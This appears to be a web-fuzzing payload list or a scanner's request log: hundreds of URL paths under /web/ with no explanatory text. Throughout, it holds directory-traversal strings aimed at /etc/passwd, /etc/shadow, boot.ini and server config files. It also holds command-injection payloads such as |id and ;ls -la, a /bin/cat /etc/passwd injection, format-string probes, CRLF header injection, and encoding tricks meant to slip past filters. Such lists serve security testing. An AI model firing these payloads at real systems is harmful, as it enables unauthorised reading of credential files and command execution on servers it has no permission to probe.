/web/\nnetstat%20-a%\n/
/web/FALSE/,/web/-1/,/web/-2/,/web/-268435455/,/web/null/,/web/\0/,/web/`id`/,/web/\0\0\0/,/web/|id/,/web/id%00|/,/web/?x=|/,/web/../../../../../../../../../../../../etc/hosts%00/,/web//../../../../../../../../%2A/
/web/00/,/web/2/,/web/268435455/,/web/%0a/,/web/+%00/,/web/$NULL/,/web/`dir`/,/web/|ls%20-la/,/web/|dir/,/web/\n/bin/ls%20-al\n/,/web/../../boot.ini/
/web/0/,/web/%00/,/web/$null/,/web/|id|/,/web/|ls/,/web/?x=>/,/web/ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|/
/web/A/,/web/1/,/web/-1.0/,/web/65536/,/web/0xfffffff/,/web/NULL/,/web/\00\00\00/,/web/\0/,/web/id%00/,/web/|dir|/,/web/?x=/,/web/../../../../../../../../../../../../etc/hosts/
/web/1.0/,/web/\00/,/web/\00/,/web/\"blah/,/web/;ls%20-la/,/web//boot.ini/,/web//index.html|id|/,/web//../../../../../../../../../../etc/passwd^^/
/web/&quot;;id&quot;/,/web//etc/passwd/,/web/../../../../../../../../../../../../etc/passwd/
/web/\..\..\..\..\..\..\..\..\..\..\etc\shadow/,/web//../../../../../../../../../../etc/passwd/
/web/../../../../../../../../../../../../boot.ini/
/web//..\../..\../..\../..\../..\../..\../etc/passwd/,/web/%00../../../../../../etc/passwd/,/web/\\&apos;/bin/cat%20/etc/passwd\\&apos;/,/web/..\..\..\..\..\..\..\..\..\..\boot.ini/,/web//../../../../../../../../../../../boot.ini%00/,/web/C:/boot.ini/,/web/../../../../../../../../conf/server.xml/
/web//../../../../../../../../../../../boot.ini%00.jpg/,/web/&lt;!--,/web//,%ENV,//
/web//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini/,/web/..\..\..\..\..\..\..\..\..\..\boot.ini%00/,/web//./././././././././././boot.ini/,/web/../../../../../../../../../../../../localstart.asp%00/,/web/C:/inetpub/wwwroot/global.asa/,/web/}/,/web/&lt;!--,/web/!@,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini/
/web/;/,/web//.../.../.../.../...//,/web/\\/,/web/\\\\*/,/web/<</,/web/&,/web/!@,/web/@'/,/web/*|/,/web/</,/web//%00//,/web/%5C//,/web/%3C%3F/,/web/..%u2215/
/web/*/,/web/&lt/,/web/\/,/web/`/,/web/&,/web/!'/,/web/{'}/,/web/--/,/web/<<</,/web/,/web/%00/,/web/%2e%2e%2f/,/web/%20/,/web/..%%35%63/
/web/,/web/&LT/,/web/\\//,/web/(')/,/web/"\t"/,/web/,/web//'/,/web/||/,/web/,/web/,/web/%5C/,/web/%2A/,/web/..//,/web//%2A/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/..%u2216/
/web/&,/web/&,/web/..%%35c/
/web/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini/,/web/%0d%0aX-Injection-Header:%20AttackValue/,/web///,/web/&lt;/,/web/&LT;/,/web/&,/web/%01%02%03%04%0a%0d%0aADSF/,/web/[']/,/web/^'/,/web/|/,/web/%00//,/web/%3C/,/web/<?/,/web/%250a/,/web/%2500/,/web/..\/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/..%bg%qf/
/web////
